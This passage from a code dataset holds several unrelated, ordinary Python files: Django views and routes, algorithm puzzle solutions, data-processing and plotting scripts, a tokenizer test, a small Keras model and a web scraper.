a94 = request.POST.get('a94', '')\n if a94 == '':\n a94 = 0\n else:\n a94 = float(a94)\n a95 = request.POST.get('a95', '')\n if a95 == '':\n a95 = 0\n else:\n a95 = float(a95)\n a96 = request.POST.get('a96', '')\n if a96 == '':\n a96 = 0\n else:\n a96 = float(a96)\n a97 = request.POST.get('a97', '')\n if a97 == '':\n a97 = 0\n else:\n a97 = float(a97)\n a98 = request.POST.get('a98', '')\n if a98 == '':\n a98 = 0\n else:\n a98 = float(a98)\n a99 = request.POST.get('a99', '')\n if a99 == '':\n a99 = 0\n else:\n a99 = float(a99)\n a100 = request.POST.get('a100', '')\n if a100 == '':\n a100 = 0\n else:\n a100 = float(a100)\n a101 = request.POST.get('a101', '')\n if a101 == '':\n a101 = 0\n else:\n a101 = float(a101)\n a102 = request.POST.get('a102', '')\n if a102 == '':\n a102 = 0\n else:\n a102 = float(a102)\n a103 = request.POST.get('a103', '')\n if a103 == '':\n a103 = 0\n else:\n a103 = float(a103)\n a104 = request.POST.get('a104', '')\n if a104 == '':\n a104 = 0\n else:\n a104 = float(a104)\n a105 = request.POST.get('a105', '')\n if a105 == '':\n a105 = 0\n else:\n a105 = float(a105)\n a106 = request.POST.get('a106', '')\n if a106 == '':\n a106 = 0\n else:\n a106 = float(a106)\n a107 = request.POST.get('a107', '')\n if a107 == '':\n a107 = 0\n else:\n a107 = float(a107)\n a108 = request.POST.get('a108', '')\n if a108 == '':\n a108 = 0\n else:\n a108 = float(a108)\n a109 = request.POST.get('a109', '')\n if a109 == '':\n a109 = 0\n else:\n a109 = float(a109)\n a110 = request.POST.get('a110', '')\n if a110 == '':\n a110 = 0\n else:\n a110 = float(a110)\n a111 = request.POST.get('a111', '')\n if a111 == '':\n a111 = 0\n else:\n a111 = float(a111)\n a112 = request.POST.get('a112', '')\n if a112 == '':\n a112 = 0\n else:\n a112 = float(a112)\n a113 = request.POST.get('a113', '')\n if a113 == '':\n a113 = 0\n else:\n a113 = float(a113)\n a114 = request.POST.get('a114', '')\n if a114 == '':\n a114 = 0\n else:\n a114 = float(a114)\n a115 = request.POST.get('a115', '')\n if a115 == '':\n a115 = 0\n else:\n a115 = float(a115)\n a116 = request.POST.get('a116', '')\n if a116 == '':\n a116 = 0\n else:\n a116 = float(a116)\n a117 = request.POST.get('a117', '')\n if a117 == '':\n a117 = 0\n else:\n a117 = float(a117)\n a118 = request.POST.get('a118', '')\n if a118 == '':\n a118 = 0\n else:\n a118 = float(a118)\n \n \n SUMB1 = a5+a9+a13+a17+a21+a25+a29+a33+a37+a41+a45\n SUMC1 = a6+a10+a14+a18+a22+a26+a30+a34+a38+a42+a46\n SUME1 = a7+a11+a15+a19+a23+a27+a31+a35+a39+a43+a47+a49\n SUMF1 = a8+a12+a16+a20+a24+a28+a32+a36+a40+a44+a48+a50\n SUBB1 = a75-a79\n SUBC1 = a76-a80\n SUME2 = a57+a61+a65+a69+a73+a77+a81\n SUMF2 = a58+a62+a66+a70+a74+a78+a82\n SUME3 = SUME1+SUME2\n SUMF3 = SUMF1+SUMF2\n SUBB2 = SUBB1 - a83\n SUBC2 = SUBC1 - a84\n SUME4 = a91+a95+a99+a103+a107+a111\n SUMF4 = a92+a96+a100+a104+a108+a112\n SUMB2 = a63+a67+a71+SUBB2+a85+a89+a93+a97+a101+a105+a109+a113+a115+a117\n SUMC2 = a64+a68+a72+SUBC2+a86+a90+a94+a98+a102+a106+a110+a114+a116+a118\n SUMB3 = SUMB1+SUMB2\n SUMC3 = SUMC1+SUMC2\n SUME5 = SUME3+SUME4\n SUMF5 = SUMF3+SUMF4 \n now = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))\n \n\n \n result = usertable.objects.get(userid=userid)\n newbalancesheet = balancesheet(user=result, \\\n SUMB1 = SUMB1, SUMC1 = SUMC1,\\\n SUME1 = SUME1,\\\n unit = unit, \\\n date = now, \\\n SUMF1 = SUMF1,\\\n SUBB1 = SUBB1,\\\n SUBC1 = SUBC1,\\\n SUME2 = SUME2,\\\n SUMF2 = SUMF2,\\\n SUME3 = SUME3,\\\n SUMF3 = SUMF3,\\\n SUBB2 = SUBB2,\\\n SUBC2 = SUBC2,\\\n SUME4 = SUME4,\\\n SUMF4 = SUMF4,\\\n SUMB2 = 
SUMB2,\\\n SUMC2 = SUMC2,\\\n SUMB3 = SUMB3,\\\n SUMC3 = SUMC3,\\\n SUME5 = SUME5,\\\n SUMF5 = SUMF5,\\\n a5=a5, a6=a6, \\\n a7=a7, a8=a8, \\\n a9=a9, a10=a10, \\\n a11=a11, a12=a12, \\\n a13=a13, a14=a14, \\\n a15=a15, a16=a16, \\\n a17=a17, a18=a18, \\\n a19=a19, a20=a20, \\\n a21=a21, a22=a22, \\\n a23=a23, a24=a24, \\\n a25=a25, a26=a26, \\\n a27=a27, a28=a28, \\\n a29=a29, a30=a30, \\\n a31=a31, a32=a32, \\\n a33=a33, a34=a34, \\\n a35=a35, a36=a36, \\\n a37=a37, a38=a38, \\\n a39=a39, a40=a40, \\\n a41=a41, a42=a42, \\\n a43=a43, a44=a44, \\\n a45=a45, a46=a46, \\\n a47=a47, a48=a48, \\\n a49=a49, a50=a50, \\\n a55=a55, a56=a56, \\\n a57=a57, a58=a58, \\\n a59=a59, a60=a60, \\\n a61=a61, a62=a62, \\\n a63=a63, a64=a64, \\\n a65=a65, a66=a66, \\\n a67=a67, a68=a68, \\\n a69=a69, a70=a70, \\\n a71=a71, a72=a72, \\\n a73=a73, a74=a74, \\\n a75=a75, a76=a76, \\\n a77=a77, a78=a78, \\\n a79=a79, a80=a80, \\\n a81=a81, a82=a82, \\\n a83=a83, a84=a84, \\\n a85=a85, a86=a86, \\\n a87=a87, a88=a88, \\\n a89=a89, a90=a90, \\\n a91=a91, a92=a92, \\\n a93=a93, a94=a94, \\\n a95=a95, a96=a96, \\\n a97=a97, a98=a98, \\\n a99=a99, a100=a100, \\\n a101=a101, a102=a102, \\\n a103=a103, a104=a104, \\\n a105=a105, a106=a106, \\\n a107=a107, a108=a108, \\\n a109=a109, a110=a110, \\\n a111=a111, a112=a112, \\\n a113=a113, a114=a114, \\\n a115=a115, a116=a116, \\\n a117=a117, a118=a118\n )\n newbalancesheet.save()\n \n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1, \"issave\":1 })\n \n#def searchbill(request, userid):\ndef searchbalancesheet(request, userid):\n username = request.POST.get(\"username\", '')\n \n \n selectpeople = request.POST.get(\"selectpeople\", '')\n selecttime = request.POST.get(\"selecttime\", '')\n# peoplename = request.POST.get(\"peoplename\", '')\n unit = request.POST.get(\"unit\", '')\n yearfrom = request.POST.get(\"yearfrom\", '')\n monthfrom = request.POST.get(\"monthfrom\", '')\n dayfrom = request.POST.get(\"dayfrom\", '')\n yearto = request.POST.get(\"yearto\", '')\n monthto = request.POST.get(\"monthto\", '')\n dayto = request.POST.get(\"dayto\", '')\n selectpeople = selectpeople.encode('utf-8') #需要注意编码问题,避免出现ascii的错误\n selecttime = selecttime.encode(\"utf-8\")\n# peoplename = peoplename.encode('utf-8') #这样才能与python内部的编码一起使用\n yearfrom = int(yearfrom)\n monthfrom = int(monthfrom)\n dayfrom = int(dayfrom)\n yearto = int(yearto)\n monthto = int(monthto)\n dayto = int(dayto)\n datefrom = datetime.datetime(yearfrom, monthfrom, dayfrom)\n dateto = datetime.datetime(yearto, monthto, dayto)\n# \n results = balancesheet.objects.filter(user=userid)\n if(selectpeople == \"编制单位\"):\n results = results.filter(unit = unit)\n if(selecttime == \"保存日期\"):\n results = results.filter(date__range=(datefrom, dateto))\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1 })","sub_path":"UserManage/balancesheet.py","file_name":"balancesheet.py","file_ext":"py","file_size_in_byte":54324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"83905029","text":"INF=9876543210\r\nfrom collections import deque\r\ndR=(-1,0,1,0)\r\ndC=(0,-1,0,1)\r\nN,M=map(int,input().split())\r\nL=[]\r\nfor i in range(N):\r\n L.append(list(input()))\r\n\r\n\r\ndef bfs(case,q,visited):\r\n while 
(q):\r\n r, c, to = q.popleft()\r\n if L[r][c] == \"C\":\r\n case.append([visited[r][c][to],r,c,to])\r\n for k in range(4):\r\n if k==to:\r\n continue\r\n tempR = r + dR[k]\r\n tempC = c + dC[k]\r\n if 0 <= tempR < N and 0 <= tempC < M and L[tempR][tempC] != \"#\" and visited[tempR][tempC][k] == 0:\r\n visited[tempR][tempC][k] = visited[r][c][to] + 1\r\n q.append([tempR, tempC, k])\r\n\r\ndef dfs(dist,startR,startC,to,cnt):\r\n global ans\r\n\r\n if ans<=dist:\r\n return\r\n #print(dist, startR, startC, to, cnt)\r\n #두개다 찾았으면\r\n if cnt==2:\r\n if dist vcenter - axrng:\r\n\t\ty-= vstep\r\n\t\tx = hcenter - axrng\r\n\t\twhile x < hcenter + axrng:\r\n\t\t\tx+= hstep\r\n\t\t\t\t\r\n\t\t\tn = 0\r\n\t\t\ta = complex(x,y)\r\n\t\t\t\r\n\t\t\t# n < 100 is the number of iterations\r\n\t\t\t# Increase this value to show finer detail\r\n\t\t\t# Decrease the value if nothing shows on the screen\r\n\t\t\twhile n < 200:\r\n\t\t\t\tn+=1 \r\n\t\t\t\ta = a**3 + z\r\n\t\t\t\tzz = abs(a)\r\n\t\t\t\tif zz > 2:\r\n\t\t\t\t\tglColor3f(cos(zz),sin(zz)*cos(zz),sin(zz))\r\n\t\t\t\t\tglVertex2f(x,y)\r\n\t\t\t\t\tn = 5001\r\n\t\t\tif zz < 200:\r\n\t\t\t\tglColor3f(tan(zz),sin(zz),cos(n))\t\r\n\t\t\t\tglVertex2f(x,y) \r\n\r\n\r\n\tglEnd()\r\n\tglFlush()\r\n\t\t\t\r\ndef main():\r\n\tglutInitDisplayMode(GLUT_RGB | GLUT_SINGLE)\r\n\tglutInitWindowPosition(50, 50)\r\n\tglutInitWindowSize(width, height)\r\n\tglutInit(sys.argv)\r\n\tglutCreateWindow(\"Julia Set\")\r\n\tglutDisplayFunc(drawjulia)\r\n\tinit()\r\n\tglutMainLoop()\r\n\t\r\nmain()\r\n\r\n# End Program\t\r\n","sub_path":"Python_Programming_in_OpenGL_Blank/PyExpJulia.py","file_name":"PyExpJulia.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67365323","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n path('', include('app.urls')),\n path(r'app/', include('app.urls')),\n path(r'api/', include('api.urls')),\n path(r'accounts/', include('django_registration.backends.activation.urls')),\n path(r'accounts/', include('django.contrib.auth.urls')),\n path('darposht/', admin.site.urls),\n]\n","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"440500351","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/pyams_utils/decorator.py\n# Compiled at: 2020-02-18 19:11:13\n# Size of source mod 2**32: 2207 bytes\n__doc__ = 'PyAMS_utils.decorator module\\n\\nThis module only provides a single decorator, which can be used to mark a function as\\ndeprecated.\\n'\nimport functools, warnings\n__docformat__ = 'restructuredtext'\n\ndef deprecated(*msg):\n r\"\"\"This is a decorator which can be used to mark functions as deprecated.\n\n It will result in a warning being emitted when the function is used.\n\n >>> from pyams_utils.context import capture_stderr\n >>> from pyams_utils.decorator import deprecated\n\n >>> @deprecated\n ... def my_function(value):\n ... return value\n\n >>> with capture_stderr(my_function, 1) as err:\n ... print(err.split('\\n')[0])\n >> @deprecated('Deprecation message')\n ... def my_function_2(value):\n ... return value\n\n >>> with capture_stderr(my_function_2, 2) as err:\n ... 
print(err.split('\\n')[0])\n =2015] #limit to year >= 2015\n \n df_filt = df_filt.filter(['scenario','region','landleaf','year','value_profit','Units_profit'])\n \n #split up landleaf into crop, basin, irrigation or rainfed\n df_filt[['crop','basin','ww_type','hi_lo']] = df_filt.landleaf.str.rsplit('_',3,expand=True)\n \n #limit to just basins in LAC\n df_filt = df_filt[(df_filt.basin.isin(lac_basins_short)) & (~(df_filt.basin.isin(['California','UsaColoRS'])))]\n #rename water basins appropriately\n df_filt.basin = df_filt.basin.map(short_to_long)\n\n #limit land type to just crops\n crop_list = ['Corn','FiberCrop','FodderGrass','FodderHerb','MiscCrop','OilCrop',\n 'OtherGrain','Rice','Root_Tuber','SugarCrop','Wheat','PalmFruit']\n df_filt = df_filt[df_filt.crop.isin(crop_list)]\n \n #filter scenario name out into parameters\n df_filt = scen_columns(df_filt)\n \n #save profit data (by crop) - may need this later\n savepath = '/cluster/tufts/lamontagnelab/abirnb01/Paper1/GCAM_queries/query_results/final_results/crop_profit'\n isdir = os.path.isdir(savepath) \n if not isdir:\n os.mkdir(savepath)\n \n df_filt.to_csv(savepath+'/'+db+'_profit.csv')\n \n #now sum up across crops to get basin net profit\n \n #save profit sum data\n savepath = '/cluster/tufts/lamontagnelab/abirnb01/Paper1/GCAM_queries/query_results/final_results/crop_profit_sum'\n isdir = os.path.isdir(savepath) \n if not isdir:\n os.mkdir(savepath)\n \n #sum across region, landleaf, crop, ww_type, hi_lo (get total crop profit for basin)\n df_sum = df_filt.groupby(['scenario','year','basin','tax','ssp','ag','soc','esm','res','gw'])['value_profit'].sum()\n df_sum = df_sum.reset_index()\n df_sum['Units_profit'] = '$1975'\n df_sum = df_sum.set_index('scenario')\n \n #save as csv\n df_sum.to_csv(savepath+'/'+db+'_profit_sum.csv')\n \n#Now sum up crop profit sums across databases to get single pickle file that contains it for all of the databases\nquery = 'crop_profit_sum'\nnewpath = '/cluster/tufts/lamontagnelab/abirnb01/Paper1/GCAM_queries/query_results/final_results/'\nos.chdir(newpath+query)\nos.getcwd()\n\nextension = 'csv'\nall_filenames = [i for i in glob.glob('*.{}'.format(extension))]\ncombined_csv = pd.concat([pd.read_csv(f) for f in all_filenames[:]])\n\ncombined_csv.to_pickle('/cluster/tufts/lamontagnelab/abirnb01/GCAM_queries/query_results/final_results/pickle_data/'+query)\n","sub_path":"scripts/query_scripts/processing_queries/profit_import.py","file_name":"profit_import.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"592014021","text":"import numpy as np\nimport cv2\n\nimg= cv2.imread('a.png', cv2.IMREAD_COLOR) #read it in as color\n\ncv2.line(img, (0,0), (150,150), (255,255,255), 15) #where line starts and ends and color of line (blue,green,red), line width = 15 px\ncv2.rectangle(img, (15,25), (200,150), (0,255,0), 5) #where rectangle starts and ends\ncv2.circle(img, (100,63), 55,(0,0,255), -1) #-1 will fill in the image with the color. center , radius, color, \n#Polygon. 
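The `pyams_utils.decorator` record above breaks off after its doctests, before the implementation itself. A conventional implementation matching the documented behaviour — usable bare as `@deprecated` or with an optional message — is sketched here; this is an assumed reconstruction, not recovered source.

```python
# Assumed reconstruction of a @deprecated decorator matching the doctests
# above: works bare (@deprecated) or with a message (@deprecated('...')).
import functools
import warnings

def deprecated(*msg):
    def wrap(func, message):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # Emit the warning each time the deprecated function is called.
            warnings.warn(message, DeprecationWarning, stacklevel=2)
            return func(*args, **kwargs)
        return wrapper

    if len(msg) == 1 and callable(msg[0]):
        # Bare usage: @deprecated
        return wrap(msg[0], "%s is deprecated." % msg[0].__name__)
    # Usage with an explicit message: @deprecated('Deprecation message')
    return lambda func: wrap(func, msg[0])
```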
Will connect points and optionally close polygon.\n\npts = np.array([[10,5], [20,30], [70,20], [50,10]], np.int32) #datatype\npts=pts.reshape((-1,1,2)) #opencv documentation suggests to convert array to 1x2\n\ncv2.polylines(img, [pts], True, (0,255,255), 3 ) #TRue is whether or not we want to connect final point to first point...color, line-width\n\n#now...writing.\n#FONT\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(img, 'OpenCV TUTS!', (0,130), font, 10, (200,255,255), 2, cv2.LINE_AA) #starting, font, size\n#color, thickness.., \n\n\ncv2.imshow('image', img)\ncv2.waitKey(0) #for any key to be pressed\ncv2.destroyAllWindows()","sub_path":"drawingonimage_basics.py","file_name":"drawingonimage_basics.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"82616257","text":"from typing import List, Dict\nfrom piecash import Split\nimport datetime\nimport warnings\n\nclass Reconciler:\n\n def __init__(self, split_candidates: List[Split]):\n self.split_candidates: Dict[datetime.date, Split] = {} \n for split in split_candidates:\n\n if not split.transaction.post_date in self.split_candidates:\n self.split_candidates[split.transaction.post_date] = {split.value: [split]}\n continue\n\n value2split = self.split_candidates[split.transaction.post_date]\n\n if not split.value in value2split:\n value2split[split.value] = [split]\n continue\n\n value2split[split.value].append(split) \n\n def reconcile(self, date, price):\n \"\"\"Try to reconcile the splits and return the result. If success, mark the split.\n Reconciliation succeed if there is a split with the same date and the same price.\n \"\"\"\n \n if date in self.split_candidates and price in self.split_candidates[date]:\n splits = self.split_candidates[date][price]\n if len(splits) > 1 and splits[-2].reconcile_state != \"y\":\n warnings.warn(f\"There exists unreconciled split with the same date and the value in { splits[-1].transaction.description}. Reconciliation may be inaccurate.\")\n # Only mark the last one as reconciled.\n if splits[-1].reconcile_state != \"y\":\n splits[-1].reconcile_state = \"c\"\n return True\n else:\n return False","sub_path":"gnucash_csv_importer/reconciler.py","file_name":"reconciler.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351023071","text":"import csv\n\ndef importtriangle(file):\n csv.QUOTE_NONNUMERIC\n triangle = []\n with open(file) as datafile:\n reader = csv.reader(datafile, delimiter=' ')\n for row in reader:\n n=0\n for x in row:\n row[n] = int(x)\n n+=1\n triangle.append(row)\n return(triangle) \n # print(','.join(row))\n\n\ndef findpath(triangle):\n x= len(triangle)\n for row in range(x-1,0,-1):\n for col in range(len(triangle[row-1])):\n if (triangle[row][col] > triangle[row][col+1]):\n triangle[row-1][col] += triangle[row][col]\n else:\n triangle[row-1][col] += triangle[row][col+1]\n return triangle\n\nif (__name__ == \"__main__\"):\n triangle = importtriangle(\"p067_triangle.txt\")\n trysumed = findpath(triangle)\n print(trysumed[0])","sub_path":"Euler/sixties/maxpath.py","file_name":"maxpath.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"618254965","text":"# coding=utf-8\n# Copyright 2018 Salesforce and HuggingFace Inc. 
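The `findpath` routine in maxpath.py above collapses the triangle bottom-up, folding the larger of each cell's two children into its parent so that the apex ends up holding the maximum path sum. A small worked check of the same logic, using the well-known 4-row example triangle (an assumed sample input, not the project's p067_triangle.txt; `max()` stands in for the original's if/else):

```python
# Worked check of the bottom-up max-path logic in maxpath.py above.
triangle = [
    [3],
    [7, 4],
    [2, 4, 6],
    [8, 5, 9, 3],
]

for row in range(len(triangle) - 1, 0, -1):
    for col in range(len(triangle[row - 1])):
        # Fold the better of the two children into the parent cell.
        triangle[row - 1][col] += max(triangle[row][col], triangle[row][col + 1])

print(triangle[0][0])  # 23  (3 + 7 + 4 + 9)
```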
team.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport os\nimport unittest\n\nfrom transformers.models.bertweet.tokenization_bertweet import VOCAB_FILES_NAMES, BertweetTokenizer\n\nfrom ...test_tokenization_common import TokenizerTesterMixin\n\n\nclass BertweetTokenizationTest(TokenizerTesterMixin, unittest.TestCase):\n tokenizer_class = BertweetTokenizer\n test_rust_tokenizer = False\n\n def setUp(self):\n super().setUp()\n\n # Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt\n vocab = [\"I\", \"m\", \"V@@\", \"R@@\", \"r\", \"e@@\"]\n vocab_tokens = dict(zip(vocab, range(len(vocab))))\n merges = [\"#version: 0.2\", \"a m\"]\n self.special_tokens_map = {\"unk_token\": \"\"}\n\n self.vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES[\"vocab_file\"])\n self.merges_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES[\"merges_file\"])\n with open(self.vocab_file, \"w\", encoding=\"utf-8\") as fp:\n for token in vocab_tokens:\n fp.write(f\"{token} {vocab_tokens[token]}\\n\")\n with open(self.merges_file, \"w\", encoding=\"utf-8\") as fp:\n fp.write(\"\\n\".join(merges))\n\n def get_tokenizer(self, **kwargs):\n kwargs.update(self.special_tokens_map)\n return BertweetTokenizer.from_pretrained(self.tmpdirname, **kwargs)\n\n def get_input_output_texts(self, tokenizer):\n input_text = \"I am VinAI Research\"\n output_text = \"I m V I Re e \"\n return input_text, output_text\n\n def test_full_tokenizer(self):\n tokenizer = BertweetTokenizer(self.vocab_file, self.merges_file, **self.special_tokens_map)\n text = \"I am VinAI Research\"\n bpe_tokens = \"I a@@ m V@@ i@@ n@@ A@@ I R@@ e@@ s@@ e@@ a@@ r@@ c@@ h\".split()\n tokens = tokenizer.tokenize(text)\n self.assertListEqual(tokens, bpe_tokens)\n\n input_tokens = tokens + [tokenizer.unk_token]\n\n input_bpe_tokens = [4, 3, 5, 6, 3, 3, 3, 4, 7, 9, 3, 9, 3, 3, 3, 3, 3]\n self.assertListEqual(tokenizer.convert_tokens_to_ids(input_tokens), input_bpe_tokens)\n","sub_path":"tests/models/bertweet/test_tokenization_bertweet.py","file_name":"test_tokenization_bertweet.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317631651","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\n\ndata = pd.read_csv('data/breastcancer.csv')\n# Select rows with particular indices and particular columns\nx = data.iloc[:, [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 31]]\n# LabelEncoder() used to normalize labels.\nlabel = LabelEncoder()\n# Fit label encoder and return encoded labels with diagnosis\ndata['d'] = label.fit_transform(data['diagnosis'].astype('str'))\ny = data['d']\n\nX_train, X_test, Y_train, Y_test = train_test_split(x, y, test_size=0.25, 
random_state=87)\n# scale the data\nscale = StandardScaler()\nX_train = scale.fit_transform(X_train)\nX_test = scale.transform(X_test)\n\nnp.random.seed(155)\nmy_first_nn = Sequential() # create a sequential model\nmy_first_nn.add(Dense(30, input_dim=29, activation='relu')) # hidden layer\nmy_first_nn.add(Dense(1, activation='sigmoid')) # output layer\nmy_first_nn.compile(loss='binary_crossentropy', optimizer='adam', metrics=[\"accuracy\"])\nmy_first_nn_fitted = my_first_nn.fit(X_train, Y_train, epochs=100, verbose=0, initial_epoch=0)\n\nprint(my_first_nn.summary())\nprint(my_first_nn.evaluate(X_test, Y_test, verbose=0))\n","sub_path":"DL-ICP1/normalize-standard-scaler.py","file_name":"normalize-standard-scaler.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605573297","text":"# -*- coding: UTF-8 -*-\n\nimport requests\nimport re\n\nroots = ['https://www.21ks.net/lunwen/dljslw/',\n 'https://www.21ks.net/lunwen/dljslw/List_4.html',\n 'https://www.21ks.net/lunwen/dljslw/List_3.html',\n 'https://www.21ks.net/lunwen/dljslw/List_2.html',\n 'https://www.21ks.net/lunwen/dljslw/List_1.html']\n\nhead = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36'}\ndir = '/Users/mac/Desktop/毕设/webspider/'\n\ndef func():\n # 加载论文源网页\n addi = []\n fileCounts = 1\n for root in roots:\n html = requests.get(root, headers=head)\n html.encoding = \"GB2312\"\n sites = re.findall('
    (.*?)
    ', html.text, re.S)\n for site in sites:\n # print(site)\n s = re.findall('', site, re.S)\n for ss in s:\n addi.append(ss)\n # Load each paper page\n for site in addi:\n html = requests.get(site, headers=head)\n html.encoding = \"GB2312\"\n label = re.findall('

    (.*?)

    ', html.text, re.S)\n\n fileName = dir + str(fileCounts) + '.txt'\n doc = open(fileName, 'w')\n print('file counts:%d'%(fileCounts))\n\n for each in label:\n raw = each.lstrip().rstrip();\n pattern = re.compile(r'<[^>]+>', re.S)\n result = pattern.sub('', raw)\n print(result, file=doc)\n\n doc.close()\n fileCounts = fileCounts + 1\n\n\nif __name__ == '__main__':\n func()","sub_path":"src/webspider.py","file_name":"webspider.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"624966279","text":"# -*- coding: utf-8 -*-\nfrom tori.decorator.controller import renderer\nfrom council.common.handler import Controller\n\n@renderer('council.view')\nclass Home(Controller):\n def get(self):\n if not self.authenticated:\n return self.redirect('/login')\n elif not self.authenticated.active:\n return self.redirect('/me')\n\n self.render('index.html', js_module_name='Index')\n\n@renderer('council.view')\nclass Login(Controller):\n def get(self):\n if self.authenticated:\n return self.redirect('/')\n\n self.render('login.html', js_module_name='Login')","sub_path":"council/council/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"303585468","text":"# -*- coding: utf-8 -*-\nimport MySQLdb\n\n\n\ndef GetTitle(Id):\n\n #ローカルMySQLを使用\n connection = MySQLdb.connect(db = \"wiki\", user = \"root\")\n cursor = connection.cursor()\n\n cursor.execute(\"select * from page where page_id=\" + str(Id) + \" and page_namespace=0\")\n result = cursor.fetchall()\n\n #titleを返す\n if(len(result) > 0):\n return result[0][2]\n\n return ''\n","sub_path":"課題1-1/GetTitleFromIdApi.py","file_name":"GetTitleFromIdApi.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"185390400","text":"# Copyright 2018 Jetperch LLC\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis executable captures the raw USB stream from Joulescope devices\nand saves the raw stream data to a file. 
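GetTitleFromIdApi.py above builds its SQL by concatenating the id straight into the query string. A parameterized variant is sketched below (function name assumed; same wiki/page schema as the original): MySQLdb binds the value itself when given a tuple, which avoids injection if the id ever arrives as a string.

```python
# Parameterized sketch of the lookup in GetTitleFromIdApi.py above.
import MySQLdb

def get_title(page_id):
    connection = MySQLdb.connect(db="wiki", user="root")
    try:
        cursor = connection.cursor()
        # The driver substitutes %s safely; no string concatenation of
        # untrusted values into the SQL text.
        cursor.execute(
            "SELECT page_title FROM page"
            " WHERE page_id = %s AND page_namespace = 0",
            (page_id,),
        )
        row = cursor.fetchone()
        return row[0] if row else ''
    finally:
        connection.close()
```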
This executable is a\ndevelopment tool and is not intended for customer use.\n\"\"\"\n\nfrom joulescope_ui.main import run\nfrom joulescope_ui.logging_util import LEVELS\n\n\nNAME = \"ui\"\n\n\ndef parser_config(p):\n \"\"\"Start the Joulescope graphical user interface\"\"\"\n p.add_argument('filename',\n default=None,\n nargs='?',\n help='The optional filename to display immediately')\n p.add_argument('--device_name',\n help='The device name to search [joulescope]')\n p.add_argument('--console_log_level', '--log_level',\n choices=list(LEVELS.keys()),\n help='The console (stdout) log level.')\n p.add_argument('--file_log_level',\n choices=list(LEVELS.keys()),\n help='The file log level.')\n return on_cmd\n\n\ndef on_cmd(args):\n return run(device_name=args.device_name,\n log_level=args.console_log_level,\n file_log_level=args.file_log_level,\n filename=args.filename)\n","sub_path":"joulescope_ui/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351611770","text":"#!/usr/bin/python3\n\"\"\"THis module contains the function to find the perimeter of an island\n\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"Function to find the perimeter of a island\n Args:\n grid (list of lists): Contains the \"map\" of the island\n Returns:\n int: Perimeter of such island\n \"\"\"\n peri = 0\n for x in range(len(grid)):\n for y in range(len(grid[x])):\n if grid[x][y] == 1:\n if y + 1 >= len(grid[x]) or grid[x][y + 1] == 0:\n peri += 1\n if y - 1 < 0 or 